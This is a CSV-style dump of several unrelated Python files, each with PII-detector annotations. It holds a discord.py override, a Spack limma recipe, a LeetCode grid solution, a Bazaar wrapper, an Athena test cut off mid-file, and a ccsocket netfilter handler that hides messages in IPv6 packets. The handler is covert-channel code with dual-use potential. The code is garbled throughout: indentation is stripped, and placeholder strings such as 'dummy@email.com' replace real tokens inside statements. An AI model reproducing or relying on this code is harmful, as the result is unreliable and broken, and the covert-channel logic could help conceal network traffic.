",5405,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'other.nbFiles'], ['PERSON', 'self.owner == other.owner'], ['NRP', 'self.rights.ljust(rights_width'], ['LOCATION', 'self.date.strftime(""%Y-%M-%d'], ['NRP', 'owner_width'], ['LOCATION', 'owner_width'], ['DATE_TIME', 'month'], ['DATE_TIME', 'parsed_date.day'], ['URL', 'self.pa'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.gr'], ['URL', 'other.gr'], ['URL', 'self.si'], ['URL', 'other.si'], ['URL', 'self.rights.st'], ['URL', 'self.to'], ['URL', 'self.is'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.date.st'], ['URL', 'self.pa'], ['URL', 'fs.gr'], ['URL', 'fs.si'], ['URL', 'fs.date.st'], ['URL', 'fs.pa'], ['URL', 'status.to'], ['URL', 'email.com'], ['URL', 're.ma'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'm.gr'], ['URL', 'datetime.datetime.no'], ['URL', 'm.gr'], ['URL', 'self.pa'], ['URL', 'self.pa'], ['URL', 'os.path.jo'], ['URL', 'self.pa'], ['URL', 'self.pe'], ['URL', 'date.ye'], ['URL', 'date.mo'], ['URL', 'self.pa']]"
58,"# coding=utf-8
""""""Overrides for Discord.py classes""""""
import contextlib
import inspect
import io
import itertools
import re
import discord
from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command
from bot.utils import polr, privatebin
from bot.utils.args import ArgParseConverter as ArgPC
def create_help(cmd, parser):
""""""Creates an updated usage for the help command""""""
default = cmd.params['args'].default
if cmd.signature.split(""["")[-1] == f""args={default}]"" if default else ""args]"":
sio = io.StringIO()
with contextlib.redirect_stdout(sio):
parser.print_help()
sio.seek(0)
s = sio.read()
# Strip the filename and trailing newline from help text
arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1]
k = cmd.qualified_name
spt = len(k.split())
# Remove a duplicate command name + leading arguments
split_sig = cmd.signature.split()[spt:]
return ""["".join(("" "".join(split_sig)).split(""["")[:-1]) + arg_part
return cmd.usage
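# create_help() only takes effect for commands whose `args` parameter is
# annotated with an ArgParseConverter; HelpFormatter.format() below splices
# the argparse-generated option summary into the normal command signature.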
class HelpFormatter(HelpF):
""""""Custom override for the default help command""""""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._paginator = None
async def format(self):
""""""Handles the actual behaviour involved with formatting.
To change the behaviour, this method should be overridden.
Returns
--------
list
A paginated output of the help command.
""""""
self._paginator = Paginator()
# we need a padding of ~80 or so
description = self.command.description if not self.is_cog() else inspect.getdoc(self.command)
if description:
# <description> portion
self._paginator.add_line(description, empty=True)
if isinstance(self.command, Command):
# <signature portion>
if self.command.params.get("args", None) and type(self.command.params['args'].annotation) == ArgPC:
self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser)
signature = self.get_command_signature()
self._paginator.add_line(signature, empty=True)
# <long doc> section
if self.command.help:
self._paginator.add_line(self.command.help, empty=True)
# end it here if it's just a regular command
if not self.has_subcommands():
self._paginator.close_page()
return self._paginator.pages
max_width = self.max_name_size
def category(tup):
""""""Splits the help command into categories for easier readability""""""
cog = tup[1].cog_name
# we insert the zero width space there to give it approximate
# last place sorting position.
return cog + ':' if cog is not None else '\u200bNo Category:'
filtered = await self.filter_command_list()
if self.is_bot():
data = sorted(filtered, key=category)
for category, commands in itertools.groupby(data, key=category):
# there simply is no prettier way of doing this.
commands = sorted(commands)
if len(commands) > 0:
self._paginator.add_line(category)
self._add_subcommands_to_page(max_width, commands)
else:
filtered = sorted(filtered)
if filtered:
self._paginator.add_line('Commands:')
self._add_subcommands_to_page(max_width, filtered)
# add the ending note
self._paginator.add_line()
ending_note = self.get_ending_note()
self._paginator.add_line(ending_note)
return self._paginator.pages
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
def _is_submodule(parent, child):
return parent == child or child.startswith(parent + ""."")
async def _default_help_command(ctx, *commands: str):
""""""Shows this message.""""""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = await bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
pages = await bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.all_commands.get(name)
if command is None:
await destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.all_commands.get(key)
if command is None:
await destination.send(bot.command_not_found.format(key))
return
except AttributeError:
await destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = await bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(len, pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
try:
await destination.send(page)
except discord.Forbidden:
destination = ctx.message.channel
await destination.send(page)
old_send = discord.abc.Messageable.send
async def send(self, content=None, **kwargs):
""""""Overrides default send method in order to create a paste if the response is more than 2000 characters""""""
if content is not None and any(x in str(content) for x in [""@everyone"", ""@here""]):
content = content.replace(""@everyone"", dummy@email.com(""@here"", ""@h\u0435re"")
if content is not None and len(str(content)) > 2000:
if content.startswith(""```py""):
content = ""\n"".join(content.split(""\n"")[1:-1])
paste = await privatebin.upload(content, expires=""15min"", server=self.bot.priv)
if self.bot.polr:
paste = await polr.shorten(paste, **self.bot.polr)
return await old_send(self, f""Hey, I couldn't handle all the text I was gonna send you, so I put it in a paste!""
f""\nThe link is **{paste}**, but it expires in 15 minutes, so get it quick!"",
**kwargs)
else:
return await old_send(self, content, **kwargs)
",7157,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Discord.py'], ['PERSON', 'sio = io.'], ['PERSON', 'StringIO'], ['LOCATION', 'parser.print_help'], ['PERSON', 'self.is_cog'], ['PERSON', 'self.is_bot'], ['LOCATION', 'bot.pm_help'], ['LOCATION', 'bot.pm_help'], ['DATE_TIME', '15 minutes'], ['URL', 'Discord.py'], ['URL', 'discord.ext.com'], ['URL', 'bot.utils.ar'], ['URL', 'cmd.pa'], ['URL', 'cmd.si'], ['URL', 'io.St'], ['URL', 'contextlib.red'], ['URL', 'parser.pr'], ['URL', 'sio.se'], ['URL', 'sio.re'], ['URL', 'cmd.si'], ['URL', 'cmd.us'], ['URL', 'self.command.de'], ['URL', 'self.is'], ['URL', 'inspect.ge'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'self.command.params.ge'], ['URL', 'self.command.pa'], ['URL', 'self.command.us'], ['URL', 'self.com'], ['URL', 'self.command.pa'], ['URL', '.annotation.pa'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.ad'], ['URL', 'self.com'], ['URL', 'paginator.cl'], ['URL', 'paginator.pa'], ['URL', 'self.ma'], ['URL', 'self.fi'], ['URL', 'self.is'], ['URL', 'itertools.gr'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'paginator.ad'], ['URL', 'self.ge'], ['URL', 'paginator.ad'], ['URL', 'paginator.pa'], ['URL', 're.com'], ['URL', 'transforms.ke'], ['URL', 'child.st'], ['URL', 'ctx.bo'], ['URL', 'ctx.message.au'], ['URL', 'bot.pm'], ['URL', 'ctx.message.ch'], ['URL', 'transforms.ge'], ['URL', 'obj.gr'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.co'], ['URL', 'bot.co'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'pattern.su'], ['URL', 'bot.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'pattern.su'], ['URL', 'command.al'], ['URL', 'commands.ge'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'found.fo'], ['URL', 'destination.se'], ['URL', 'bot.com'], ['URL', 'subcommands.fo'], ['URL', 'bot.formatter.fo'], ['URL', 'bot.pm'], ['URL', 'ctx.message.au'], ['URL', 'destination.se'], ['URL', 'discord.Fo'], ['URL', 'ctx.message.ch'], ['URL', 'destination.se'], ['URL', 'discord.abc.Messageable.se'], ['URL', 'content.re'], ['URL', 'email.com'], ['URL', 'content.st'], ['URL', 'self.bot.pr'], ['URL', 'self.bo'], ['URL', 'polr.sh'], ['URL', 'self.bo']]"
59,"##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, dummy@email.com, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RLimma(RPackage):
""""""Data analysis, linear models and differential expression
for microarray data.""""""
homepage = ""https://www.bioconductor.org/packages/limma/""
url = ""https://git.bioconductor.org/packages/limma""
list_url = homepage
version('3.32.10', git='https://git.bioconductor.org/packages/limma', commit='PI:KEY')
version('3.32.6', 'PI:KEY')
depends_on(dummy@email.com', dummy@email.com')
",1694,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://git.bioconductor.org/packages/limma""'], ['URL', ""https://git.bioconductor.org/packages/limma',""], ['DATE_TIME', '2013-2017'], ['PERSON', 'Todd Gamblin'], ['DATE_TIME', 'February 1999'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['URL', 'https://github.com/llnl/spack'], ['URL', 'https://www.bioconductor.org/packages/limma/""'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com']]"
60,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
*****************************************
Author: zhlinh
Email: dummy@email.com
Version: 0.0.1
Created Time: 2016-03-11
Last_modify: 2016-03-11
******************************************
'''
'''
Given a 2D board containing 'X' and 'O',
capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's
into 'X's in that surrounded region.
For example,
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
'''
class Solution(object):
def solve(self, board):
""""""
:type board: List[List[str]]
:rtype: void Do not return anything, modify board in-place instead.
""""""
m = len(board)
if m < 2:
return
n = len(board[0])
for i in range(m):
self.helper(board, i, 0, m, n)
if n > 1:
self.helper(board, i, n - 1, m, n)
for j in range(n):
self.helper(board, 0, j, m, n)
if m > 1:
self.helper(board, m - 1, j, m, n)
for i in range(m):
for j in range(n):
if board[i][j] == 'O':
board[i][j] = 'X'
if board[i][j] == '1':
board[i][j] = 'O'
def helper(self, board, i, j, m, n):
if board[i][j] == 'O':
board[i][j] = '1'
# trick here: normally the check could be i >= 1,
# but the boundary rows/columns always get checked by the outer loops,
# so when i == 1, re-checking index 0 would be duplicated work.
if i > 1:
self.helper(board, i - 1, j, m, n)
if i < m - 2:
self.helper(board, i + 1, j, m, n)
if j > 1:
self.helper(board, i, j - 1, m, n)
if j < n - 2:
self.helper(board, i, j + 1, m, n)
",1908,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2016-03-11'], ['DATE_TIME', '2016-03-11'], ['URL', 'email.com']]"
61,"#!/usr/bin/python
# -*- coding: UTF-8 -*-
## This file is part of ccsocket
## Copyright (C) Tomas Dragoun dummy@email.com
## This program is published under a GPLv3 license
########################################################
import nfqueue
import sys
import signal
from multiprocessing import Process, Pipe, Lock
from socket import AF_INET6
from scapy.all import *
from scapy.layers.inet6 import ICMPv6Unknown
from headers import IPv6ExtHdrAH
from constants import Constants
############################
## ##
## NFQHandler ##
## ##
############################
class NFQHandler(Process):
#----------------------------------------------------------------------------------
'''
This class handles a netfilter queue. It is connected to the parent
process via a pipe. Messages are decoded and removed from incoming
packets and the data are sent through the pipe. In passive mode the
queue intercepts both incoming and outgoing traffic. Inherits
multiprocessing.Process.
'''
#----------------------------------------------------------------------------------
def __init__(self, encoder, pipe, sendevt, stopevt, proto, active, address):
''' Call parent's constructor at first '''
Process.__init__(self) # init parent (multiprocessing.Process)
self.name = 'NFQHandler-port ' + str(address[1])
self.daemon = True # set process daemonic
''' Initialize class attributes '''
self._const = Constants()
self._encoder = encoder # encodes message in packet
self._pipe = pipe # exchange data with parent process via pipe
self._can_send = sendevt # event shared with parent process
self._stop_send = stopevt # event shared with parent process
self._proto = proto # upper-layer protocol
self._active = active # mode
self._host = address[0]
self._port = address[1]
'''
The following steps prepare a netfilter queue with _port as the
queue number. There is always only one active queue associated
with a given number.
'''
self._queue = nfqueue.queue() # create queue
self._queue.open() # open queue
try:
self._queue.bind(AF_INET6) # set family type AF_INET6
except: # fails when any other queue already runs
pass
self._queue.set_callback(self.handlepacket) # set queue callback
'''
The final step raises RuntimeError in case some other queue with
the same number is active, the queue wasn't closed properly, or
the user's privileges are insufficient.
'''
try:
self._queue.create_queue(self._port)
except Exception, e:
raise e
#----------------------------------------------------------------------------------
def __del__(self):
if self._pipe: # close connection with parent process
self._pipe.close()
#----------------------------------------------------------------------------------
def destroyqueue(self):
''' Attempts to close queue '''
if self._queue:
#print 'stopping queue ' + str(self._port)
self._queue.close() # close queue
self._queue = None
#----------------------------------------------------------------------------------
def _clear(self):
''' Removes all data to send from pipe and sets state to idle '''
while self._pipe.poll(): # clear pipe
self._pipe.recv()
self._can_send.set()
self._stop_send.clear()
#----------------------------------------------------------------------------------
def run(self):
'''
Runs an endless loop. Every time a packet occurs in the queue,
the handlepacket method is called.
'''
#print 'starting queue ' + str(self._port)
self._queue.try_run()
#----------------------------------------------------------------------------------
def handlepacket(self, number, payload):
''' Queue callback function '''
packet = IPv6(payload.get_data()) # decode packet from queue as IPv6
'''
Check if packet belongs to this queue - upperlayer ID field must match
in active mode.
'''
modify, reroute = self._checkport(packet)
if not modify:
'''
Reroute the packet to the correct queue. The NF_QUEUE verdict is a
32-bit number: the lower 16 bits encode the verdict itself and the
upper 16 bits identify the target queue.
'''
if reroute != -1:
error = payload.set_verdict(nfqueue.NF_QUEUE | (reroute << 16))
if not error:
return
'''
The packet doesn't have an ICMP echo layer or the target port
isn't active; accept the packet.
'''
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
The port is OK; we need to check whether the address matches. Ip6tables
rules filter addresses, but the packet might have been rerouted from
another queue.
'''
if len(self._host): # check source/destination address
if packet.src != self._host and packet.dst != self._host:
payload.set_verdict(nfqueue.NF_ACCEPT)
return
'''
Nfqueue mark is used to distinguish between incoming and outgoing
packets. Each packet is marked.
'''
mark = payload.get_nfmark() # get mark of this packet
if mark == 1: # incoming packet
self._incoming(packet, payload)
elif mark == 2: # outgoing packet
self._outgoing(packet, payload)
#----------------------------------------------------------------------------------
def _incoming(self, packet, payload):
message = self._encoder.getmessage(packet) # decode message
if message is None: # no message
''' Accept packet '''
payload.set_verdict(nfqueue.NF_ACCEPT)
else:
''' Remove message and pass modified packet to queue '''
modified_packet = self._encoder.removemessage(packet)
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
try:
if not len(message):
return
except:
pass
self._pipe.send((message, (packet.src, self._port, 0, 0)))
#----------------------------------------------------------------------------------
def _outgoing(self, packet, payload):
if self._stop_send.is_set():
self._clear()
if self._pipe.poll(): # any data to send?
message = self._pipe.recv() # get message
''' Encode message and return modified packet to queue '''
modified_packet = self._encoder.addmessage(message, (packet, None))
payload.set_verdict_modified(nfqueue.NF_ACCEPT,
str(modified_packet),
len(modified_packet))
if not self._pipe.poll(): # sending finished
self._can_send.set()
else: # nothing to send, return packet to queue
payload.set_verdict(nfqueue.NF_ACCEPT)
#----------------------------------------------------------------------------------
def _checkport(self, packet):
'''
Returns a tuple (bool, value). True if the packet belongs to this queue;
in passive mode it always returns True. In active mode the upper-layer
id field must match the current _port number. Value is the number of the
queue to which the packet will be rerouted.
'''
''' Passive mode - override icmp id check '''
if not self._active:
return (True, 0)
''' Active mode - check icmp (or fragment) id field (~ represents port) '''
if packet.haslayer(ICMPv6EchoRequest): # upperlayer ICMPv6EchoRequest
id = packet[ICMPv6EchoRequest].id
elif packet.haslayer(ICMPv6EchoReply): # upperlayer ICMPv6EchoReply
id = packet[ICMPv6EchoReply].id
elif packet.haslayer(IPv6ExtHdrFragment): # fragmented packet
id = packet[IPv6ExtHdrFragment].id
elif packet.haslayer(ICMPv6Unknown) and packet.haslayer(IPv6ExtHdrAH):
type = packet[ICMPv6Unknown].type # ICMPv6 packet with AH
if type != 128 and type != 129:
return (False, -1) # accept packet
packet[IPv6ExtHdrAH].decode_payload_as(ICMPv6EchoRequest)
id = packet[ICMPv6EchoRequest].id
elif self._proto == self._const.PROTO_ALL: # any protocol
return (True, 0) # id matches port number
else:
return (False, -1) # accept packet
if id == self._port:
return (True, 0) # id matches port number
else:
return (False, id) # reroute to correct queue
#----------------------------------------------------------------------------------
",9616,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Tomas Dragoun'], ['PERSON', 'GPLv3'], ['LOCATION', '#'], ['LOCATION', '#'], ['LOCATION', 'stopevt'], ['PERSON', 'self._active'], ['PERSON', 'Verdict NF_QUEUE'], ['PERSON', 'upperlayer ICMPv6EchoRequest\n i'], ['PERSON', 'AH'], ['URL', 'email.com'], ['URL', 'scapy.al'], ['URL', 'scapy.layers.in'], ['URL', 'multiprocessing.Pro'], ['URL', 'multiprocessing.Pro'], ['URL', 'self.na'], ['URL', 'queue.bi'], ['URL', 'queue.se'], ['URL', 'queue.cr'], ['URL', 'pipe.cl'], ['URL', 'queue.cl'], ['URL', 'pipe.re'], ['URL', 'send.se'], ['URL', 'send.cl'], ['URL', 'queue.tr'], ['URL', 'payload.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'packet.sr'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'payload.ge'], ['URL', 'encoder.ge'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'encoder.re'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'pipe.se'], ['URL', 'packet.sr'], ['URL', 'send.is'], ['URL', 'pipe.re'], ['URL', 'encoder.ad'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'send.se'], ['URL', 'payload.se'], ['URL', 'nfqueue.NF'], ['URL', 'const.PRO']]"
62,"###############################################################################
# Name: Cody Precord #
# Purpose: SourceControl implementation for Bazaar #
# Author: Cody Precord dummy@email.com #
# Copyright: (c) 2008 Cody Precord dummy@email.com #
# License: wxWindows License #
###############################################################################
""""""Bazaar implementation of the SourceControl object """"""
__author__ = ""Cody Precord dummy@email.com""
__revision__ = ""$Revision: 867 $""
__scid__ = ""$Id: BZR.py 867 2009-05-06 12:10:55Z CodyPrecord $""
#------------------------------------------------------------------------------#
# Imports
import os
import datetime
import re
import time
# Local imports
from SourceControl import SourceControl, DecodeString
#------------------------------------------------------------------------------#
class BZR(SourceControl):
"""""" Bazaar source control class """"""
name = 'Bazaar'
command = 'bzr'
ccache = list() # Cache of paths that are under bazaar control
repocache = dict()
def __repr__(self):
return 'BZR.BZR()'
def getAuthOptions(self, path):
"""""" Get the repository authentication info """"""
output = []
return output
def getRepository(self, path):
"""""" Get the repository of a given path """"""
if path in self.repocache:
return self.repocache[path]
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
while True:
if not root:
break
if os.path.exists(os.path.join(root, '.bzr')):
break
else:
root = os.path.split(root)[0]
# Cache the repo of this path for faster lookups next time
self.repocache[path] = root
return root
def isControlled(self, path):
"""""" Is the path controlled by BZR? """"""
t1 = time.time()
# Check for cached paths to speed up lookup
if path in self.ccache:
return True
if not os.path.isdir(path):
root = os.path.split(path)[0]
else:
root = path
last = False
while True:
if os.path.exists(os.path.join(root, '.bzr')):
# If a containing directory of the given path has a .bzr
# directory in it run status to find out if the file is being
# tracked or not.
retval = False
out = self.run(root + os.sep, ['status', '-S', path])
if out:
lines = out.stdout.readline()
if lines.startswith('?'):
fname = lines.split(None, 1)[1].strip()
fname = fname.rstrip(os.sep)
retval = not path.endswith(fname)
else:
retval = True
self.closeProcess(out)
if retval:
self.ccache.append(path)
return retval
elif last:
break
else:
root, tail = os.path.split(root)
# If tail is None or '' then this has gotten to the root
# so mark it as the last run
if not tail:
last = True
return False
def add(self, paths):
"""""" Add paths to the repository """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['add'] + files)
self.logOutput(out)
self.closeProcess(out)
def checkout(self, paths):
"""""" Checkout files at the given path """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['checkout',], files)
self.logOutput(out)
self.closeProcess(out)
def commit(self, paths, message=''):
"""""" Commit paths to the repository """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['commit', '-m', message] + files)
self.logOutput(out)
self.closeProcess(out)
def diff(self, paths):
"""""" Run the diff program on the given files """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['diff'] + files)
self.closeProcess(out)
def makePatch(self, paths):
"""""" Make a patch of the given paths """"""
root, files = self.splitFiles(paths)
patches = list()
for fname in files:
out = self.run(root, ['diff', fname])
lines = [ line for line in out.stdout ]
self.closeProcess(out)
patches.append((fname, ''.join(lines)))
return patches
def history(self, paths, history=None):
"""""" Get the revision history of the given paths """"""
if history is None:
history = []
root, files = self.splitFiles(paths)
for fname in files:
out = self.run(root, ['log', fname])
logstart = False
if out:
for line in out.stdout:
self.log(line)
if line.strip().startswith('-----------'):
logstart = False
current = dict(path=fname, revision=None,
author=None, date=None, log=u'')
history.append(current)
elif line.startswith('message:'):
logstart = True
elif logstart:
current['log'] += DecodeString(line)
elif line.startswith('revno:'):
current['revision'] = DecodeString(line.split(None, 1)[-1].strip())
elif line.startswith('committer:'):
author = line.split(None, 1)[-1]
current['author'] = DecodeString(author.strip())
elif line.startswith('timestamp:'):
date = line.split(None, 1)[-1]
current['date'] = self.str2datetime(date.strip())
else:
pass
self.logOutput(out)
self.closeProcess(out)
return history
def str2datetime(self, tstamp):
"""""" Convert a timestamp string to a datetime object """"""
parts = tstamp.split()
ymd = [int(x.strip()) for x in parts[1].split('-')]
hms = [int(x.strip()) for x in parts[2].split(':')]
date = ymd + hms
return datetime.datetime(*date)
def remove(self, paths):
"""""" Recursively remove paths from repository """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['remove', '--force'] + files)
self.logOutput(out)
def status(self, paths, recursive=False, status=dict()):
"""""" Get BZR status information from given file/directory """"""
codes = {' ':'uptodate', 'N':'added', 'C':'conflict', 'D':'deleted',
'M':'modified'}
root, files = self.splitFiles(paths)
# -S gives output similar to svn which is a little easier to work with
out = self.run(root, ['status', '-S'] + files)
repo = self.getRepository(paths[0])
relpath = root.replace(repo, '', 1).lstrip(os.sep)
unknown = list()
if out:
for line in out.stdout:
self.log(line)
txt = line.lstrip(' +-')
# Split the status code and relative file path
code, fname = txt.split(None, 1)
fname = fname.replace(u'/', os.sep).strip().rstrip(os.sep)
fname = fname.replace(relpath, '', 1).lstrip(os.sep)
code = code.rstrip('*')
# Skip unknown files
if code == '?':
unknown.append(fname)
continue
# Get the absolute file path
current = dict()
try:
current['status'] = codes[code]
status[fname] = current
except KeyError:
pass
# Find up to date files
unknown += status.keys()
for path in os.listdir(root):
if path not in unknown:
status[path] = dict(status='uptodate')
self.logOutput(out)
return status
def update(self, paths):
"""""" Recursively update paths """"""
root, files = self.splitFiles(paths)
out = self.run(root, ['update'] + files)
self.logOutput(out)
def revert(self, paths):
"""""" Recursively revert paths to repository version """"""
root, files = self.splitFiles(paths)
if not files:
files = ['.']
out = self.run(root, ['revert'] + files)
self.logOutput(out)
def fetch(self, paths, rev=None, date=None):
"""""" Fetch a copy of the paths' contents """"""
output = []
for path in paths:
if os.path.isdir(path):
continue
root, files = self.splitFiles(path)
options = []
if rev:
options.append('-r')
options.append(str(rev))
if date:
# Date format YYYY-MM-DD,HH:MM:SS
options.append('-r')
options.append('date:%s' % date)
out = self.run(root, ['cat'] + options + files)
if out:
output.append(out.stdout.read())
self.logOutput(out)
else:
output.append(None)
return output
",9977,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Cody Precord '], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['PERSON', 'Cody Precord'], ['DATE_TIME', '2009-05-06'], ['LOCATION', 'self.ccache'], ['PERSON', 'fname = lines.split(None'], ['PERSON', 'fname'], ['PERSON', 'logstart'], ['PERSON', '= line.split(None'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'BZR.py'], ['URL', 'BZR.BZ'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'self.re'], ['URL', 'self.cc'], ['URL', 'os.path.is'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'os.path.jo'], ['URL', 'self.ru'], ['URL', 'os.se'], ['URL', 'out.stdout.re'], ['URL', 'lines.st'], ['URL', 'fname.rs'], ['URL', 'os.se'], ['URL', 'self.cl'], ['URL', 'self.cc'], ['URL', 'os.pa'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'self.cl'], ['URL', 'self.ru'], ['URL', 'out.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'author.st'], ['URL', 'line.st'], ['URL', 'self.st'], ['URL', 'date.st'], ['URL', 'self.cl'], ['URL', 'x.st'], ['URL', 'x.st'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'self.ge'], ['URL', 'root.re'], ['URL', 'os.se'], ['URL', 'out.st'], ['URL', 'line.ls'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'os.se'], ['URL', 'fname.re'], ['URL', 'os.se'], ['URL', 'code.rs'], ['URL', 'status.ke'], ['URL', 'os.li'], ['URL', 'self.ru'], ['URL', 'self.ru'], ['URL', 'os.path.is'], ['URL', 'self.ru'], ['URL', 'out.stdout.re']]"
63,"# -*- coding: utf-8 -*-
import re
import unittest
import uuid
from datetime import date, datetime
from decimal import Decimal
from urllib.parse import quote_plus
import numpy as np
import pandas as pd
import sqlalchemy
from sqlalchemy import String
from sqlalchemy.engine import create_engine
from sqlalchemy.exc import NoSuchTableError, OperationalError, ProgrammingError
from sqlalchemy.sql import expression
from sqlalchemy.sql.schema import Column, MetaData, Table
from sqlalchemy.sql.sqltypes import (
BIGINT,
BINARY,
BOOLEAN,
DATE,
DECIMAL,
FLOAT,
INTEGER,
STRINGTYPE,
TIMESTAMP,
)
from tests.conftest import ENV, SCHEMA
from tests.util import with_engine
class TestSQLAlchemyAthena(unittest.TestCase):
""""""Reference test case is following:
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py
https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py
""""""
def create_engine(self, **kwargs):
conn_str = (
""awsathena+rest://athena.{region_name}.amazonaws.com:443/""
+ ""{schema_name}?s3_staging_dir={s3_staging_dir}&s3_dir={s3_dir}""
+ ""&compression=snappy""
)
if ""verify"" in kwargs:
conn_str += ""&verify={verify}""
if ""duration_seconds"" in kwargs:
conn_str += ""&duration_seconds={duration_seconds}""
if ""poll_interval"" in kwargs:
conn_str += ""&poll_interval={poll_interval}""
if ""kill_on_interrupt"" in kwargs:
conn_str += ""&kill_on_interrupt={kill_on_interrupt}""
return create_engine(
conn_str.format(
region_name=ENV.region_name,
schema_name=SCHEMA,
s3_staging_dir=quote_plus(ENV.s3_staging_dir),
s3_dir=quote_plus(ENV.s3_staging_dir),
**kwargs
)
)
@with_engine()
def test_basic_query(self, engine, conn):
rows = conn.execute(""SELECT * FROM one_row"").fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].number_of_rows, 1)
self.assertEqual(len(rows[0]), 1)
@with_engine()
def test_reflect_no_such_table(self, engine, conn):
self.assertRaises(
NoSuchTableError,
